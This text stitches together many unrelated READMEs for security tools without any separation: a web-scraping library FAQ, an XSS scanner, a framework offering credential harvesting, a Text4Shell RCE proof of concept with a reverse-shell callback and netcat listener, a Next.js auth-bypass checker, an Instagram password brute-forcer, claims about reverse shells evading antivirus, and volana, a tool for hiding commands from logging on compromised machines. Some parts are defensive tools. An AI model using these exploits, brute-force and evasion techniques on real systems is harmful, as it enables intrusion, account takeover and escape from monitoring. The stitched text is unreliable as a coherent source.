Scrapling is under active development so expect many more features coming soon :)
There are a lot of deep details skipped here to make this as short as possible so to take a deep dive, head to the docs section. I will try to keep it updated as possible and add complex examples. There I will explain points like how to write your storage system, write spiders that don't depend on selectors at all, and more...
Note that implementing your storage system can be complex as there are some strict rules such as inheriting from the same abstract class, following the singleton design pattern used in other classes, and more. So make sure to read the docs first.
[!IMPORTANT] A website is needed to provide detailed library documentation.
I'm trying to rush creating the website, researching new ideas, and adding more features/tests/benchmarks but time is tight with too many spinning plates between work, personal life, and working on Scrapling. I have been working on Scrapling for months for free after all.
If you likeScrapling
and want it to keep improving then this is a friendly reminder that you can help by supporting me through the sponsor button.
This section addresses common questions about Scrapling, please read this section before opening an issue.
css
or xpath
with the auto_save
parameter set to True
before structural changes happen.Now because everything about the element can be changed or removed, nothing from the element can be used as a unique identifier for the database. To solve this issue, I made the storage system rely on two things:
identifier
parameter you passed to the method while selecting. If you didn't pass one, then the selector string itself will be used as an identifier but remember you will have to use it as an identifier value later when the structure changes and you want to pass the new selector.Together both are used to retrieve the element's unique properties from the database later. 4. Now later when you enable the auto_match
parameter for both the Adaptor instance and the method call. The element properties are retrieved and Scrapling loops over all elements in the page and compares each one's unique properties to the unique properties we already have for this element and a score is calculated for each one. 5. Comparing elements is not exact but more about finding how similar these values are, so everything is taken into consideration, even the values' order, like the order in which the element class names were written before and the order in which the same element class names are written now. 6. The score for each element is stored in the table, and the element(s) with the highest combined similarity scores are returned.
Not a big problem as it depends on your usage. The word default
will be used in place of the URL field while saving the element's unique properties. So this will only be an issue if you used the same identifier later for a different website that you didn't pass the URL parameter while initializing it as well. The save process will overwrite the previous data and auto-matching uses the latest saved properties only.
For each element, Scrapling will extract: - Element tag name, text, attributes (names and values), siblings (tag names only), and path (tag names only). - Element's parent tag name, attributes (names and values), and text.
auto_save
/auto_match
parameter while selecting and it got completely ignored with a warning messageThat's because passing the auto_save
/auto_match
argument without setting auto_match
to True
while initializing the Adaptor object will only result in ignoring the auto_save
/auto_match
argument value. This behavior is purely for performance reasons so the database gets created only when you are planning to use the auto-matching features.
It could be one of these reasons: 1. No data were saved/stored for this element before. 2. The selector passed is not the one used while storing element data. The solution is simple - Pass the old selector again as an identifier to the method called. - Retrieve the element with the retrieve method using the old selector as identifier then save it again with the save method and the new selector as identifier. - Start using the identifier argument more often if you are planning to use every new selector from now on. 3. The website had some extreme structural changes like a new full design. If this happens a lot with this website, the solution would be to make your code as selector-free as possible using Scrapling features.
Pretty much yeah, almost all features you get from BeautifulSoup can be found or achieved in Scrapling one way or another. In fact, if you see there's a feature in bs4 that is missing in Scrapling, please make a feature request from the issues tab to let me know.
Of course, you can find elements by text/regex, find similar elements in a more reliable way than AutoScraper, and finally save/retrieve elements manually to use later as the model feature in AutoScraper. I have pulled all top articles about AutoScraper from Google and tested Scrapling against examples in them. In all examples, Scrapling got the same results as AutoScraper in much less time.
Yes, Scrapling instances are thread-safe. Each Adaptor instance maintains its state.
Everybody is invited and welcome to contribute to Scrapling. There is a lot to do!
Please read the contributing file before doing anything.
[!CAUTION] This library is provided for educational and research purposes only. By using this library, you agree to comply with local and international laws regarding data scraping and privacy. The authors and contributors are not responsible for any misuse of this software. This library should not be used to violate the rights of others, for unethical purposes, or to use data in an unauthorized or illegal manner. Do not use it on any website unless you have permission from the website owner or within their allowed rules like the
robots.txt
file, for example.
This work is licensed under BSD-3
This project includes code adapted from: - Parsel (BSD License) - Used for translator submodule
VulnKnox is a powerful command-line tool written in Go that interfaces with the KNOXSS API. It automates the process of testing URLs for Cross-Site Scripting (XSS) vulnerabilities using the advanced capabilities of the KNOXSS engine.
go install github.com/iqzer0/vulnknox@latest
Before using the tool, you need to set up your configuration:
API Key
Obtain your KNOXSS API key from knoxss.me.
On the first run, a default configuration file will be created at:
Linux/macOS: ~/.config/vulnknox/config.json
Windows: %APPDATA%\VulnKnox\config.json
Edit the config.json file and replace YOUR_API_KEY_HERE
with your actual API key.
Discord Webhook (Optional)
If you want to receive notifications on Discord, add your webhook URL to the config.json file or use the -dw flag.
Usage of vulnknox:
-u Input URL to send to KNOXSS API
-i Input file containing URLs to send to KNOXSS API
-X GET HTTP method to use: GET, POST, or BOTH
-pd POST data in format 'param1=value¶m2=value'
-headers Custom headers in format 'Header1:value1,Header2:value2'
-afb Use Advanced Filter Bypass
-checkpoc Enable CheckPoC feature
-flash Enable Flash Mode
-o The file to save the results to
-ow Overwrite output file if it exists
-oa Output all results to file, not just successful ones
-s Only show successful XSS payloads in output
-p 3 Number of parallel processes (1-5)
-t 600 Timeout for API requests in seconds
-dw Discord Webhook URL (overrides config file)
-r 3 Number of retries for failed requests
-ri 30 Interval between retries in seconds
-sb 0 Skip domains after this many 403 responses
-proxy Proxy URL (e.g., http://127.0.0.1:8080)
-v Verbose output
-version Show version number
-no-banner Suppress the banner
-api-key KNOXSS API Key (overrides config file)
Test a single URL using GET method:
vulnknox -u "https://example.com/page?param=value"
Test a URL with POST data:
vulnknox -u "https://example.com/submit" -X POST -pd "param1=value1¶m2=value2"
Enable Advanced Filter Bypass and Flash Mode:
vulnknox -u "https://example.com/page?param=value" -afb -flash
Use custom headers (e.g., for authentication):
vulnknox -u "https://example.com/secure" -headers "Cookie:sessionid=abc123"
Process URLs from a file with 5 concurrent processes:
vulnknox -i urls.txt -p 5
Send notifications to Discord on successful XSS findings:
vulnknox -u "https://example.com/page?param=value" -dw "https://discord.com/api/webhooks/your/webhook/url"
Test both GET and POST methods with CheckPoC enabled:
vulnknox -u "https://example.com/page" -X BOTH -checkpoc
Use a proxy and increase the number of retries:
vulnknox -u "https://example.com/page?param=value" -proxy "http://127.0.0.1:8080" -r 5
Suppress the banner and only show successful XSS payloads:
vulnknox -u "https://example.com/page?param=value" -no-banner -s
[ XSS! ]: Indicates a successful XSS payload was found.
[ SAFE ]: No XSS vulnerability was found in the target.
[ ERR! ]: An error occurred during the request.
[ SKIP ]: The domain or URL was skipped due to multiple failed attempts (e.g., after receiving too many 403 Forbidden responses as specified by the -sb option).
[BALANCE]: Indicates your current API usage with KNOXSS, showing how many API calls you've used out of your total allowance.
The tool also provides a summary at the end of execution, including the number of requests made, successful XSS findings, safe responses, errors, and any skipped domains.
Contributions are welcome! If you have suggestions for improvements or encounter any issues, please open an issue or submit a pull request.
This project is licensed under the MIT License.
____ _ _
| _ \ ___ __ _ __ _ ___ _ _ ___| \ | |
| |_) / _ \/ _` |/ _` / __| | | / __| \| |
| __/ __/ (_| | (_| \__ \ |_| \__ \ |\ |
|_| \___|\__, |\__,_|___/\__,_|___/_| \_|
|___/
ββββ β ββββββ ββββββ
ββ ββ β ββ β ββββ βββ
βββ ββ βββββββ ββββ βββ
ββββ ββββββββ β βββ βββ
ββββ ββββββββββββ βββββββ
β ββ β β ββ ββ ββ ββββββ
β ββ β ββ β β β β β ββ
β β β β β β β β
β β β β β
PEGASUS-NEO is a comprehensive penetration testing framework designed for security professionals and ethical hackers. It combines multiple security tools and custom modules for reconnaissance, exploitation, wireless attacks, web hacking, and more.
This tool is provided for educational and ethical testing purposes only. Usage of PEGASUS-NEO for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program.
PEGASUS-NEO - Advanced Penetration Testing Framework
Copyright (C) 2024 Letda Kes dr. Sobri. All rights reserved.
This software is proprietary and confidential. Unauthorized copying, transfer, or
reproduction of this software, via any medium is strictly prohibited.
Written by Letda Kes dr. Sobri <muhammadsobrimaulana31@gmail.com>, January 2024
Password: Sobri
Social media tracking
Exploitation & Pentesting
Custom payload generation
Wireless Attacks
WPS exploitation
Web Attacks
CMS scanning
Social Engineering
Credential harvesting
Tracking & Analysis
# Clone the repository
git clone https://github.com/sobri3195/pegasus-neo.git
# Change directory
cd pegasus-neo
# Install dependencies
sudo python3 -m pip install -r requirements.txt
# Run the tool
sudo python3 pegasus_neo.py
sudo python3 pegasus_neo.py
This is a proprietary project and contributions are not accepted at this time.
For support, please email muhammadsobrimaulana31@gmail.com atau https://lynk.id/muhsobrimaulana
This project is protected under proprietary license. See the LICENSE file for details.
Made with β€οΈ by Letda Kes dr. Sobri
A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions < 1.10. This exploit targets vulnerable Java applications that use the StringSubstitutor
class with interpolation enabled, allowing injection of ${script:...}
expressions to execute arbitrary system commands.
In this PoC, exploitation is demonstrated via the data
query parameter; however, the vulnerable parameter name may vary depending on the implementation. Users should adapt the payload and request path accordingly based on the target application's logic.
Disclaimer: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk.
This is a custom Python3 exploit for the Apache Commons Text vulnerability known as Text4Shell (CVE-2022-42889). It allows Remote Code Execution (RCE) via insecure interpolators when user input is dynamically evaluated by StringSubstitutor
.
Tested against: - Apache Commons Text < 1.10.0 - Java applications using ${script:...}
interpolation from untrusted input
python3 text4shell.py <target_ip> <callback_ip> <callback_port>
python3 text4shell.py 127.0.0.1 192.168.1.2 4444
nc -nlvp 4444
The script injects:
${script:javascript:java.lang.Runtime.getRuntime().exec(...)}
The reverse shell is sent via /data
parameter using a POST request.
A Python script to check Next.js sites for corrupt middleware vulnerability (CVE-2025-29927).
The corrupt middleware vulnerability allows an attacker to bypass authentication and access protected routes by send a custom header x-middleware-subrequest
.
Next JS versions affected: - 11.1.4 and up
[!WARNING] This tool is for educational purposes only. Do not use it on websites or systems you do not own or have explicit permission to test. Unauthorized testing may be illegal and unethical.
Β
Clone the repo
git clone https://github.com/takumade/ghost-route.git
cd ghost-route
Create and activate virtual environment
python -m venv .venv
source .venv/bin/activate
Install dependencies
pip install -r requirements.txt
python ghost-route.py <url> <path> <show_headers>
<url>
: Base URL of the Next.js site (e.g., https://example.com)<path>
: Protected path to test (default: /admin)<show_headers>
: Show response headers (default: False)Basic Example
python ghost-route.py https://example.com /admin
Show Response Headers
python ghost-route.py https://example.com /admin True
MIT License
Welcome toΒ TruffleHog Explorer, a user-friendly web-based tool to visualize and analyze data extracted using TruffleHog. TruffleHog is one of the most powerful secrets discovery, classification, validation, and analysis open source tool. In this context, a secret refers to a credential a machine uses to authenticate itself to another machine. This includes API keys, database passwords, private encryption keys, and more.
With an improved UI/UX, powerful filtering options, and export capabilities, this tool helps security professionals efficiently review potential secrets and credentials found in their repositories.
β οΈ This dashboard has been tested only with GitHub TruffleHog JSON outputs. Expect updates soon to support additional formats and platforms.
You can use online version here: TruffleHog Explorer
$ git clone https://github.com/yourusername/trufflehog-explorer.git
$ cd trufflehog-explorer
index.html
Simply open the index.html
file in your preferred web browser.
$ open index.html
.json
files from TruffleHog output.Happy Securing! π
This project is a command line tool and python library that uses Wappalyzer extension (and its fingerprints) to detect technologies. Other projects emerged after discontinuation of the official open source project are using outdated fingerpints and lack accuracy when used on dynamic web-apps, this project bypasses those limitations.
Before installing wappalyzer, you will to install Firefox and geckodriver/releases">geckodriver. Below are detailed steps for setting up geckodriver but you may use google/youtube for help.
geckodriver-vX.XX.X-win64.zip
geckodriver-vX.XX.X-macos.tar.gz
geckodriver-vX.XX.X-linux64.tar.gz
To ensure Selenium can locate the GeckoDriver executable: - Windows: 1. Move the geckodriver.exe
to a directory (e.g., C:\WebDrivers\
). 2. Add this directory to the system's PATH: - Open Environment Variables. - Under System Variables, find and select the Path
variable, then click Edit. - Click New and enter the directory path where geckodriver.exe
is stored. - Click OK to save. - macOS/Linux: 1. Move the geckodriver
file to /usr/local/bin/
or another directory in your PATH. 2. Use the following command in the terminal: bash sudo mv geckodriver /usr/local/bin/
Ensure /usr/local/bin/
is in your PATH.
pipx install wappalyzer
To use it as a library, install it with pip
inside an isolated container e.g. venv
or docker
. You may also --break-system-packages
to do a 'regular' install but it is not recommended.
git clone https://github.com/s0md3v/wappalyzer-next.git
cd wappalyzer-next
docker compose up -d
To scan URLs using the Docker container:
Scan a single URL:
docker compose run --rm wappalyzer -i https://example.com
docker compose run --rm wappalyzer -i https://example.com -oJ output.json
Some common usage examples are given below, refer to list of all options for more information.
wappalyzer -i https://example.com
wappalyzer -i urls.txt -t 10
wappalyzer -i https://example.com -c "sessionid=abc123; token=xyz789"
wappalyzer -i https://example.com -oJ results.json
Note: For accuracy use 'full' scan type (default). 'fast' and 'balanced' do not use browser emulation.
-i
: Input URL or file containing URLs (one per line)--scan-type
: Scan type (default: 'full')fast
: Quick HTTP-based scan (sends 1 request)balanced
: HTTP-based scan with more requestsfull
: Complete scan using wappalyzer extension-t, --threads
: Number of concurrent threads (default: 5)-oJ
: JSON output file path-oC
: CSV output file path-oH
: HTML output file path-c, --cookie
: Cookie header string for authenticated scansThe python library is a available on pypi as wappalyzer
and can be imported with the same name.
The main function you'll interact with is analyze()
:
from wappalyzer import analyze
# Basic usage
results = analyze('https://example.com')
# With options
results = analyze(
url='https://example.com',
scan_type='full', # 'fast', 'balanced', or 'full'
threads=3,
cookie='sessionid=abc123'
)
url
(str): The URL to analyzescan_type
(str, optional): Type of scan to perform'fast'
: Quick HTTP-based scan'balanced'
: HTTP-based scan with more requests'full'
: Complete scan including JavaScript execution (default)threads
(int, optional): Number of threads for parallel processing (default: 3)cookie
(str, optional): Cookie header string for authenticated scansReturns a dictionary with the URL as key and detected technologies as value:
{
"https://github.com": {
"Amazon S3": {"version": "", "confidence": 100, "categories": ["CDN"], "groups": ["Servers"]},
"lit-html": {"version": "1.1.2", "confidence": 100, "categories": ["JavaScript libraries"], "groups": ["Web development"]},
"React Router": {"version": "6", "confidence": 100, "categories": ["JavaScript frameworks"], "groups": ["Web development"]},
"https://google.com" : {},
"https://example.com" : {},
}}
Firefox extensions are .xpi files which are essentially zip files. This makes it easier to extract data and slightly modify the extension to make this tool work.
Instagram Brute Force CPU/GPU Supported 2024
(Use option 2 while running the script.)
(Option 1 is on development)
(Chrome should be downloaded in device.)
Compatible and Tested (GUI Supported Operating Systems Only)
Python 3.13 x64 bit Unix / Linux / Mac / Windows 8.1 and higher
Install Requirements
pip install -r requirements.txt
How to run
python3 instagram_brute_force.py [instagram_username_without_hashtag]
python3 instagram_brute_force.py mrx161
The following langues are wholly ignored by AV vendors including MS-Defender: - tcl - php - crystal - julia - golang - dart - dlang - vlang - nodejs - bun - python - fsharp - deno
All of these languages were allowed to completely execute, and establish a reverse shell by MS-Defender. We assume the list is even longer, given that languages such as PHP are considered "dead" languages.
The total number of vendors that are unable to scan or process just PHP file types is 14, and they are listed below:
And the total number of vendors that are unable to accurately identify malicious PHP scripts is 54, and they are listed below:
With this in mind, and the absolute shortcomings on identifying PHP based malware we came up with the theory that the 13 identified languages are also an oversight by these vendors, including CrowdStrike, Sentinel1, Palo Alto, Fortinet, etc. We have been able to identify that at the very least Defender considers these obviously malicious payloads as plaintext.
We as the maintainers, are in no way responsible for the misuse or abuse of this product. This was published for legitimate penetration testing/red teaming purposes, and for educational value. Know the applicable laws in your country of residence before using this script, and do not break the law whilst using this. Thank you and have a nice day.
In case you are seeing all of the default declarations, and wondering wtf guys. There is a reason; this was built to be more moduler for later versions. For now, enjoy the tool and feel free to post issues. They'll be addressed as quickly as possible.
ModTracer FindsΒ HiddenΒ LinuxΒ KernelΒ Rootkits and then make visible again.
Another way to make an LKM visible is using the imperius trick: https://github.com/MatheuZSecurity/Imperius
DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more.
Docker is an open-source platform that automates the deployment, scaling, and management of applications using containerization technology. Containers allow developers to package an application and its dependencies into a single, portable unit that can run consistently across various computing environments. Docker simplifies the development and deployment process by ensuring that applications run the same way regardless of where they are deployed.
Docker Hub is a cloud-based repository where developers can store, share, and distribute container images. It serves as the largest library of container images, providing access to both official images created by Docker and community-contributed images. Docker Hub enables developers to easily find, download, and deploy pre-built images, facilitating rapid application development and deployment.
Open Source Intelligence (OSINT) on Docker Hub involves using publicly available information to gather insights and data from container images and repositories hosted on Docker Hub. This is particularly important for identifying exposed secrets for several reasons:
Security Audits: By analyzing Docker images, organizations can uncover exposed secrets such as API keys, authentication tokens, and private keys that might have been inadvertently included. This helps in mitigating potential security risks.
Incident Prevention: Proactively searching for exposed secrets in Docker images can prevent security breaches before they happen, protecting sensitive information and maintaining the integrity of applications.
Compliance: Ensuring that container images do not expose secrets is crucial for meeting regulatory and organizational security standards. OSINT helps verify that no sensitive information is unintentionally disclosed.
Vulnerability Assessment: Identifying exposed secrets as part of regular security assessments allows organizations to address these vulnerabilities promptly, reducing the risk of exploitation by malicious actors.
Enhanced Security Posture: Continuously monitoring Docker Hub for exposed secrets strengthens an organization's overall security posture, making it more resilient against potential threats.
Utilizing OSINT on Docker Hub to find exposed secrets enables organizations to enhance their security measures, prevent data breaches, and ensure the confidentiality of sensitive information within their containerized applications.
DockerSpy obtains information from Docker Hub and uses regular expressions to inspect the content for sensitive information, such as secrets.
To use DockerSpy, follow these steps:
git clone https://github.com/UndeadSec/DockerSpy.git && cd DockerSpy && make
dockerspy
To customize DockerSpy configurations, edit the following files: - Regular Expressions - Ignored File Extensions
DockerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.
Contributions to DockerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.
DockerSpy is developed and maintained by Alisson Moretto (UndeadSec)
I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.
Consider following me:
Special thanks to @akaclandestine
Reconnaissance is the first phase of penetration testing which means gathering information before any real attacks are planned So Ashok is an Incredible fast recon tool for penetration tester which is specially designed for Reconnaissance" title="Reconnaissance">Reconnaissance phase. And in Ashok-v1.1 you can find the advanced google dorker and wayback crawling machine.
- Wayback Crawler Machine
- Google Dorking without limits
- Github Information Grabbing
- Subdomain Identifier
- Cms/Technology Detector With Custom Headers
~> git clone https://github.com/ankitdobhal/Ashok
~> cd Ashok
~> python3.7 -m pip3 install -r requirements.txt
A detailed usage guide is available on Usage section of the Wiki.
But Some index of options is given below:
Ashok can be launched using a lightweight Python3.8-Alpine Docker image.
$ docker pull powerexploit/ashok-v1.2
$ docker container run -it powerexploit/ashok-v1.2 --help
Tool for Fingerprinting HTTP requests of malware. Based on Tshark and written in Python3. Working prototype stage :-)
Its main objective is to provide unique representations (fingerprints) of malware requests, which help in their identification. Unique means here that each fingerprint should be seen only in one particular malware family, yet one family can have multiple fingerprints. Hfinger represents the request in a shorter form than printing the whole request, but still human interpretable.
Hfinger can be used in manual malware analysis but also in sandbox systems or SIEMs. The generated fingerprints are useful for grouping requests, pinpointing requests to particular malware families, identifying different operations of one family, or discovering unknown malicious requests omitted by other security systems but which share fingerprint.
An academic paper accompanies work on this tool, describing, for example, the motivation of design choices, and the evaluation of the tool compared to p0f, FATT, and Mercury.
The basic assumption of this project is that HTTP requests of different malware families are more or less unique, so they can be fingerprinted to provide some sort of identification. Hfinger retains information about the structure and values of some headers to provide means for further analysis. For example, grouping of similar requests - at this moment, it is still a work in progress.
After analysis of malware's HTTP requests and headers, we have identified some parts of requests as being most distinctive. These include: * Request method * Protocol version * Header order * Popular headers' values * Payload length, entropy, and presence of non-ASCII characters
Additionally, some standard features of the request URL were also considered. All these parts were translated into a set of features, described in details here.
The above features are translated into varying length representation, which is the actual fingerprint. Depending on report mode, different features are used to fingerprint requests. More information on these modes is presented below. The feature selection process will be described in the forthcoming academic paper.
Minimum requirements needed before installation: * Python
>= 3.3, * Tshark
>= 2.2.0.
Installation available from PyPI:
pip install hfinger
Hfinger has been tested on Xubuntu 22.04 LTS with tshark
package in version 3.6.2
, but should work with older versions like 2.6.10
on Xubuntu 18.04 or 3.2.3
on Xubuntu 20.04.
Please note that as with any PoC, you should run Hfinger in a separated environment, at least with Python virtual environment. Its setup is not covered here, but you can try this tutorial.
After installation, you can call the tool directly from a command line with hfinger
or as a Python module with python -m hfinger
.
For example:
foo@bar:~$ hfinger -f /tmp/test.pcap
[{"epoch_time": "1614098832.205385000", "ip_src": "127.0.0.1", "ip_dst": "127.0.0.1", "port_src": "53664", "port_dst": "8080", "fingerprint": "2|3|1|php|0.6|PO|1|us-ag,ac,ac-en,ho,co,co-ty,co-le|us-ag:f452d7a9/ac:as-as/ac-en:id/co:Ke-Al/co-ty:te-pl|A|4|1.4"}]
Help can be displayed with short -h
or long --help
switches:
usage: hfinger [-h] (-f FILE | -d DIR) [-o output_path] [-m {0,1,2,3,4}] [-v]
[-l LOGFILE]
Hfinger - fingerprinting malware HTTP requests stored in pcap files
optional arguments:
-h, --help show this help message and exit
-f FILE, --file FILE Read a single pcap file
-d DIR, --directory DIR
Read pcap files from the directory DIR
-o output_path, --output-path output_path
Path to the output directory
-m {0,1,2,3,4}, --mode {0,1,2,3,4}
Fingerprint report mode.
0 - similar number of collisions and fingerprints as mode 2, but using fewer features,
1 - representation of all designed features, but a little more collisions than modes 0, 2, and 4,
2 - optimal (the default mode),
3 - the lowest number of generated fingerprints, but the highest number of collisions,
4 - the highest fingerprint entropy, but slightly more fingerprints than modes 0-2
-v, --verbose Report information about non-standard values in the request
(e.g., non-ASCII characters, no CRLF tags, values not present in the configuration list).
Without --logfile (-l) will print to the standard error.
-l LOGFILE, --logfile LOGFILE
Output logfile in the verbose mode. Implies -v or --verbose switch.
You must provide a path to a pcap file (-f), or a directory (-d) with pcap files. The output is in JSON format. It will be printed to standard output or to the provided directory (-o) using the name of the source file. For example, output of the command:
hfinger -f example.pcap -o /tmp/pcap
will be saved to:
/tmp/pcap/example.pcap.json
Report mode -m
/--mode
can be used to change the default report mode by providing an integer in the range 0-4
. The modes differ on represented request features or rounding modes. The default mode (2
) was chosen by us to represent all features that are usually used during requests' analysis, but it also offers low number of collisions and generated fingerprints. With other modes, you can achieve different goals. For example, in mode 3
you get a lower number of generated fingerprints but a higher chance of a collision between malware families. If you are unsure, you don't have to change anything. More information on report modes is here.
Beginning with version 0.2.1
Hfinger is less verbose. You should use -v
/--verbose
if you want to receive information about encountered non-standard values of headers, non-ASCII characters in the non-payload part of the request, lack of CRLF tags (\r\n\r\n
), and other problems with analyzed requests that are not application errors. When any such issues are encountered in the verbose mode, they will be printed to the standard error output. You can also save the log to a defined location using -l
/--log
switch (it implies -v
/--verbose
). The log data will be appended to the log file.
Beginning with version 0.2.0
, Hfinger supports importing to other Python applications. To use it in your app simply import hfinger_analyze
function from hfinger.analysis
and call it with a path to the pcap file and reporting mode. The returned result is a list of dicts with fingerprinting results.
For example:
from hfinger.analysis import hfinger_analyze
pcap_path = "SPECIFY_PCAP_PATH_HERE"
reporting_mode = 4
print(hfinger_analyze(pcap_path, reporting_mode))
Beginning with version 0.2.1
Hfinger uses logging
module for logging information about encountered non-standard values of headers, non-ASCII characters in the non-payload part of the request, lack of CRLF tags (\r\n\r\n
), and other problems with analyzed requests that are not application errors. Hfinger creates its own logger using name hfinger
, but without prior configuration log information in practice is discarded. If you want to receive this log information, before calling hfinger_analyze
, you should configure hfinger
logger, set log level to logging.INFO
, configure log handler up to your needs, add it to the logger. More information is available in the hfinger_analyze
function docstring.
A fingerprint is based on features extracted from a request. Usage of particular features from the full list depends on the chosen report mode from a predefined list (more information on report modes is here). The figure below represents the creation of an exemplary fingerprint in the default report mode.
Three parts of the request are analyzed to extract information: URI, headers' structure (including method and protocol version), and payload. Particular features of the fingerprint are separated using |
(pipe). The final fingerprint generated for the POST
request from the example is:
2|3|1|php|0.6|PO|1|us-ag,ac,ac-en,ho,co,co-ty,co-le|us-ag:f452d7a9/ac:as-as/ac-en:id/co:Ke-Al/co-ty:te-pl|A|4|1.4
The creation of features is described below in the order of appearance in the fingerprint.
Firstly, URI features are extracted: * URI length represented as a logarithm base 10 of the length, rounded to an integer, (in the example URI is 43 characters long, so log10(43)β2
), * number of directories, (in the example there are 3 directories), * average directory length, represented as a logarithm with base 10 of the actual average length of the directory, rounded to an integer, (in the example there are three directories with total length of 20 characters (6+6+8), so log10(20/3)β1
), * extension of the requested file, but only if it is on a list of known extensions in hfinger/configs/extensions.txt
, * average value length represented as a logarithm with base 10 of the actual average value length, rounded to one decimal point, (in the example two values have the same length of 4 characters, what is obviously equal to 4 characters, and log10(4)β0.6
).
Secondly, header structure features are analyzed: * request method encoded as first two letters of the method (PO
), * protocol version encoded as an integer (1 for version 1.1, 0 for version 1.0, and 9 for version 0.9), * order of the headers, * and popular headers and their values.
To represent order of the headers in the request, each header's name is encoded according to the schema in hfinger/configs/headerslow.json
, for example, User-Agent
header is encoded as us-ag
. Encoded names are separated by ,
. If the header name does not start with an upper case letter (or any of its parts when analyzing compound headers such as Accept-Encoding
), then encoded representation is prefixed with !
. If the header name is not on the list of the known headers, it is hashed using FNV1a hash, and the hash is used as encoding.
When analyzing popular headers, the request is checked if they appear in it. These headers are: * Connection * Accept-Encoding * Content-Encoding * Cache-Control * TE * Accept-Charset * Content-Type * Accept * Accept-Language * User-Agent
When the header is found in the request, its value is checked against a table of typical values to create pairs of header_name_representation:value_representation
. The name of the header is encoded according to the schema in hfinger/configs/headerslow.json
(as presented before), and the value is encoded according to schema stored in hfinger/configs
directory or configs.py
file, depending on the header. In the above example Accept
is encoded as ac
and its value */*
as as-as
(asterisk-asterisk
), giving ac:as-as
. The pairs are inserted into fingerprint in order of appearance in the request and are delimited using /
. If the header value cannot be found in the encoding table, it is hashed using the FNV1a hash.
If the header value is composed of multiple values, they are tokenized to provide a list of values delimited with ,
, for example, Accept: */*, text/*
would give ac:as-as,te-as
. However, at this point of development, if the header value contains a "quality value" tag (q=
), then the whole value is encoded with its FNV1a hash. Finally, values of User-Agent and Accept-Language headers are directly encoded using their FNV1a hashes.
Finally, in the payload features: * presence of non-ASCII characters, represented with the letter N
, and with A
otherwise, * payload's Shannon entropy, rounded to an integer, * and payload length, represented as a logarithm with base 10 of the actual payload length, rounded to one decimal point.
Hfinger
operates in five report modes, which differ in features represented in the fingerprint, thus information extracted from requests. These are (with the number used in the tool configuration): * mode 0
- producing a similar number of collisions and fingerprints as mode 2
, but using fewer features, * mode 1
- representing all designed features, but producing a little more collisions than modes 0
, 2
, and 4
, * mode 2
- optimal (the default mode), representing all features which are usually used during requests' analysis, but also offering a low number of collisions and generated fingerprints, * mode 3
- producing the lowest number of generated fingerprints from all modes, but achieving the highest number of collisions, * mode 4
- offering the highest fingerprint entropy, but also generating slightly more fingerprints than modes 0
-2
.
The modes were chosen in order to optimize Hfinger's capabilities to uniquely identify malware families versus the number of generated fingerprints. Modes 0
, 2
, and 4
offer a similar number of collisions between malware families, however, mode 4
generates a little more fingerprints than the other two. Mode 2
represents more request features than mode 0
with a comparable number of generated fingerprints and collisions. Mode 1
is the only one representing all designed features, but it increases the number of collisions by almost two times comparing to modes 0
, 1
, and 4
. Mode 3
produces at least two times fewer fingerprints than other modes, but it introduces about nine times more collisions. Description of all designed features is here.
The modes consist of features (in the order of appearance in the fingerprint): * mode 0
: * number of directories, * average directory length represented as an integer, * extension of the requested file, * average value length represented as a float, * order of headers, * popular headers and their values, * payload length represented as a float. * mode 1
: * URI length represented as an integer, * number of directories, * average directory length represented as an integer, * extension of the requested file, * variable length represented as an integer, * number of variables, * average value length represented as an integer, * request method, * version of protocol, * order of headers, * popular headers and their values, * presence of non-ASCII characters, * payload entropy represented as an integer, * payload length represented as an integer. * mode 2
: * URI length represented as an integer, * number of directories, * average directory length represented as an integer, * extension of the requested file, * average value length represented as a float, * request method, * version of protocol, * order of headers, * popular headers and their values, * presence of non-ASCII characters, * payload entropy represented as an integer, * payload length represented as a float. * mode 3
: * URI length represented as an integer, * average directory length represented as an integer, * extension of the requested file, * average value length represented as an integer, * order of headers. * mode 4
: * URI length represented as a float, * number of directories, * average directory length represented as a float, * extension of the requested file, * variable length represented as a float, * average value length represented as a float, * request method, * version of protocol, * order of headers, * popular headers and their values, * presence of non-ASCII characters, * payload entropy represented as a float, * payload length represented as a float.
XM Goat is composed of XM Cyber terraform templates that help you learn about common Azure security issues. Each template is a vulnerable environment, with some significant misconfigurations. Your job is to attack and compromise the environments.
Here's what to do for each environment:
Run installation and then get started.
With the initial user and service principal credentials, attack the environment based on the scenario flow (for example, XMGoat/scenarios/scenario_1/scenario1_flow.png).
If you need help with your attack, refer to the solution (for example, XMGoat/scenarios/scenario_1/solution.md).
When you're done learning the attack, clean up.
Run these commands:
$ az login
$ git clone https://github.com/XMCyber/XMGoat.git
$ cd XMGoat
$ cd scenarios
$ cd scenario_<\SCENARIO>
Where <\SCENARIO> is the scenario number you want to complete
$ terraform init
$ terraform plan -out <\FILENAME>
$ terraform apply <\FILENAME>
Where <\FILENAME> is the name of the output file
To get the initial user and service principal credentials, run the following query:
$ terraform output --json
For Service Principals, use application_id.value and application_secret.value.
For Users, use username.value and password.value.
After completing the scenario, run the following command in order to clean all the resources created in your tenant
$ az login
$ cd XMGoat
$ cd scenarios
$ cd scenario_<\SCENARIO>
Where <\SCENARIO> is the scenario number you want to complete
$ terraform destroy
Analyse binaries for missing security features, information disclosure and more.
Extrude is in the early stages of development, and currently only supports ELF and MachO binaries. PE (Windows) binaries will be supported soon.
Usage:
extrude [flags] [file]
Flags:
-a, --all Show details of all tests, not just those which failed.
-w, --fail-on-warning Exit with a non-zero status even if only warnings are discovered.
-h, --help help for extrude
You can optionally run extrude with docker via:
docker run -v `pwd`:/blah -it ghcr.io/liamg/extrude /blah/targetfile
Coming soon...
During pentest, an important aspect is to be stealth. For this reason you should clear your tracks after your passage. Nevertheless, many infrastructures log command and send them to a SIEM in a real time making the afterwards cleaning part alone useless.volana
provide a simple way to hide commands executed on compromised machine by providing it self shell runtime (enter your command, volana executes for you). Like this you clear your tracks DURING your passage
You need to get an interactive shell. (Find a way to spawn it, you are a hacker, it's your job ! otherwise). Then download it on target machine and launch it. that's it, now you can type the command you want to be stealthy executed
